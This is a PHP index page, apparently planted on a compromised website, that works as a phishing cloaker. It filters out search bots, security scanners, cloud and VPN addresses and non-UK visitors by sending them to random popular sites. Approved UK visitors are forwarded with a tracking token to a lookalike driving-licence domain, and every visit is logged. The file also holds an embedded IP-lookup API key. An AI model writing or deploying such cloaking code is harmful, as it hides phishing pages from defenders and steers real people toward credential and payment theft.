File: /home/chok2006/domains/chok2006.com/private_html/home/index.php
<?php
ob_start();
date_default_timezone_set('Europe/London');
$redirect_link = "https://drvbroadadress.tel/dv/online/";
$log_file = __DIR__ . "/logs.txt";
$allowed_countries = ['United Kingdom'];
$blocked_keywords = [
'amazon', 'aws', 'google', 'gcp', 'microsoft', 'azure', 'ibm', 'ibm cloud', 'alibaba', 'alibaba cloud',
'oracle', 'oracle cloud', 'tencent', 'tencent cloud', 'salesforce', 'heroku', 'netlify', 'cloud',
'cloudflare', 'cdn', 'akamai', 'fastly', 'vercel', 'render', 'fly.io', 'upcloud', 'scaleway', 'vultr',
'packet', 'equinix', 'baremetal', 'lightsail', 'lambda', 'ec2', 's3', 'blob storage', 'cloudfront',
'ovh', 'digitalocean', 'do-', 'hetzner', 'linode', 'contabo', 'nocix', 'leaseweb', 'datacamp',
'sharktech', 'colo', 'kdatacenter', 'ipxo', 'rfc1918', 'ipv6', 'host', 'hosting', 'server', 'servers',
'data center', 'data-center', 'seedbox', 'liquidweb', 'softlayer', 'online.net', 'kimsufi', 'soyoustart',
'dedibox', 'ionos', '1and1', 'godaddy', 'bluehost', 'hostgator', 'siteground', 'dreamhost', 'a2 hosting',
'inmotion', 'wpengine', 'kinsta', 'nexcess', 'vps', 'dedicated server', 'shared hosting',
'netprotect', 'anonymizer', 'privado', 'purevpn', 'surfshark', 'nordvpn', 'expressvpn', 'hide.me',
'openvpn', 'pia', 'airvpn', 'protonvpn', 'cyberghost', 'vyprvpn', 'tunnelbear', 'windscribe', 'ipvanish',
'hotspot shield', 'hoxx vpn', 'zenmate', 'tor', 'exit node', 'vpn', 'proxy', 'tunnel', 'socks', 'socks5',
'shadowsocks', 'wireguard', 'l2tp', 'pptp', 'ikev2', 'anonymizing', 'cloaking', 'masking',
'scraper', 'crawler', 'scanner', 'residential', 'ipqualityscore', 'brightdata', 'oxylabs', 'smartproxy',
'luminati', 'residential proxy', 'datacenter proxy', 'crawlera', 'zenrows', 'scrapinghub', 'scrapingbee',
'serpapi', 'apify', 'zyte', 'nibbler', 'parsehub', 'diffbot', 'phantomjs', 'scrapestack', 'scraperbox',
'scrapingdog', 'webscraper', 'webharvy', 'octoparse', 'import.io'
];
$bot_patterns = [
'googlebot', 'bingbot', 'bingpreview', 'yahoo! slurp', 'yandexbot', 'duckduckbot', 'baiduspider',
'sogou spider', 'exabot', 'facebookexternalhit', 'facebot', 'twitterbot', 'linkedinbot', 'embedly',
'quora link preview', 'pinterestbot', 'slackbot', 'telegrambot', 'discordbot', 'whatsappbot',
'redditbot', 'tumblr bot', 'flipboardbot', 'vkShare', 'weibo', 'line-poker', 'discordbot', 'iframely',
'skypeuripreview', 'slurp', 'ia_archiver', 'archive.org_bot', 'applebot', 'msnbot', 'naverbot', 'teoma',
'ahrefsbot', 'mj12bot', 'semrushbot', 'dotbot', 'petalbot', 'bytespider', 'serpstatbot', 'seekport',
'seznambot', 'blexbot', 'nerdybot', 'megaindex', 'linkdexbot', 'domainstatsbot', 'netcraftsurvey',
'sistrix', 'deepcrawl', 'sitebulb', 'lighthouse', 'calibre', 'webpagetest', 'gtmetrix', 'pingdom',
'sucuri', 'uptimerobot', 'newrelicpinger', 'datadog agent', 'statuscake', 'monitor.us', 'site24x7',
'scrapy', 'nutch', 'stormcrawler', 'heritrix', 'commoncrawl', 'httrack', 'wpull', 'grab', 'cola',
'pyppeteer', 'autoscraper', 'scraper', 'crawler', 'spider', 'headlesschrome', 'phantomjs',
'screaming frog', 'puppeteer', 'playwright', 'slimerjs', 'selenium', 'ghost', 'htmlunit',
'casperjs', 'triflejs', 'splash', 'webdriver', 'chromium', 'beautifulsoup', 'mechanize', 'lxml',
'zyte', 'apify', 'scrapinghub', 'scrapingbee', 'serpapi', 'zenrows', 'brightdata', 'oxylabs',
'smartproxy', 'luminati', 'crawlera', 'diffbot', 'parsehub', 'nibbler', 'octoparse', 'import.io',
'webscraper.io', 'webharvy', 'kimono', 'dexi.io', 'connotate', 'moz.com', 'seobility',
'nikto', 'sqlmap', 'wpscan', 'zap', 'burp', 'nessus', 'openvas', 'metasploit', 'hydra',
'johntheripper', 'havij', 'netsparker', 'acunetix', 'appscan', 'w3af', 'gobuster', 'dirbuster',
'ffuf', 'masscan', 'nmap', 'qualys', 'rapid7', 'tenable', 'nessus', 'owasp zap', 'arachni',
'email extractor', 'harvester', 'phishing', 'bruteforce', 'credential stuffing', 'carding',
'skimmer', 'spambot', 'comment spammer', 'wordpress scanner', 'joomla scanner', 'drupal scanner',
'mail.ru bot', 'mj12bot', 'xenu link sleuth', 'blexbot', 'smtp spam', 'comment spam', 'fake user-agent',
'postmanruntime', 'insomnia', 'curl', 'wget', 'python-requests', 'aiohttp', 'httpx', 'axios',
'node-fetch', 'okhttp', 'java http', 'go-http-client', 'ruby net::http', 'perl www', 'php curl',
'guzzle', 'rest-client', 'typhoeus', 'faraday', 'http.rb', 'treq', 'hyper', 'pycurl'
];
// Get next log entry number for ALLOWED connections only
function get_log_index($log_file) {
if (!file_exists($log_file)) {
return 1;
}
$content = file_get_contents($log_file);
if (empty($content)) {
return 1;
}
$lines = file($log_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$allowed_lines = array_filter($lines, function($line) {
return strpos($line, '[ALLOWED]') !== false;
});
if (empty($allowed_lines)) {
return 1;
}
$last_line = trim(end($allowed_lines));
if (preg_match('/^(\d+)\. \[ALLOWED\]/', $last_line, $match)) {
return (int)$match[1] + 1;
}
return 1;
}
function redirect_to_random_site_and_exit() {
$random_sites = [
'https://www.google.com', 'https://www.gmail.com', 'https://www.yahoo.com', 'https://www.hotmail.com',
'https://www.outlook.com', 'https://www.bing.com', 'https://www.duckduckgo.com', 'https://www.youtube.com',
'https://www.facebook.com', 'https://www.twitter.com', 'https://www.instagram.com', 'https://www.linkedin.com',
'https://www.tiktok.com', 'https://www.reddit.com', 'https://www.amazon.com', 'https://www.ebay.com',
'https://www.netflix.com', 'https://www.spotify.com', 'https://www.apple.com', 'https://www.microsoft.com'
];
$random_url = $random_sites[array_rand($random_sites)];
header("Location: $random_url");
exit;
}
function get_client_ip() {
$keys = ['HTTP_CLIENT_IP','HTTP_X_FORWARDED_FOR','HTTP_X_FORWARDED','HTTP_FORWARDED_FOR','HTTP_FORWARDED','REMOTE_ADDR'];
foreach ($keys as $key) {
if (!empty($_SERVER[$key])) {
$iplist = explode(',', $_SERVER[$key]);
return trim($iplist[0]);
}
}
return 'UNKNOWN';
}
if (empty($_COOKIE['js_verified'])) {
echo "<html><head><script>
document.cookie = 'js_verified=1; path=/';
window.location.reload();
</script></head><body>
<noscript><meta http-equiv='refresh' content='0;url=https://www.google.com/'></noscript>
</body></html>";
exit;
}
$ip = get_client_ip();
$user_agent = strtolower($_SERVER['HTTP_USER_AGENT'] ?? 'unknown');
$date = date("Y-m-d H:i:s");
// Block bots
foreach ($bot_patterns as $bot) {
if (strpos($user_agent, $bot) !== false) {
file_put_contents($log_file, "[BOT BLOCKED] $ip | UA: $user_agent | $date\n", FILE_APPEND);
redirect_to_random_site_and_exit();
}
}
// Geo info
$country = 'Unknown';
$isp = 'Unknown';
$api_key = 'AI7020f9QYMGkLY';
$api_url = "https://pro.ip-api.com/json/{$ip}?fields=country,isp,status&key={$api_key}";
$response = @file_get_contents($api_url);
if ($response !== false) {
$data = json_decode($response, true);
if (!empty($data) && $data['status'] === 'success') {
$country = $data['country'] ?? 'Unknown';
$isp = strtolower($data['isp'] ?? 'Unknown');
}
}
// Block by ISP or UA
foreach ($blocked_keywords as $keyword) {
if (strpos($isp, $keyword) !== false || strpos($user_agent, $keyword) !== false) {
file_put_contents($log_file, "[BLOCKED ISP] $ip | ISP: $isp | Country: $country | $date | UA: $user_agent\n", FILE_APPEND);
redirect_to_random_site_and_exit();
}
}
// Block by country
if (!in_array($country, $allowed_countries, true)) {
file_put_contents($log_file, "[BLOCKED COUNTRY] $ip | Country: $country | ISP: $isp | $date | UA: $user_agent\n", FILE_APPEND);
redirect_to_random_site_and_exit();
}
// Allowed - only these get numbered
$log_index = get_log_index($log_file);
file_put_contents($log_file, "{$log_index}. [ALLOWED] $ip | Country: $country | ISP: $isp | $date | UA: $user_agent\n", FILE_APPEND);
$unique_code = bin2hex(random_bytes(200));
if (!headers_sent()) {
header("Location: {$redirect_link}?ref={$unique_code}");
}
exit;
?>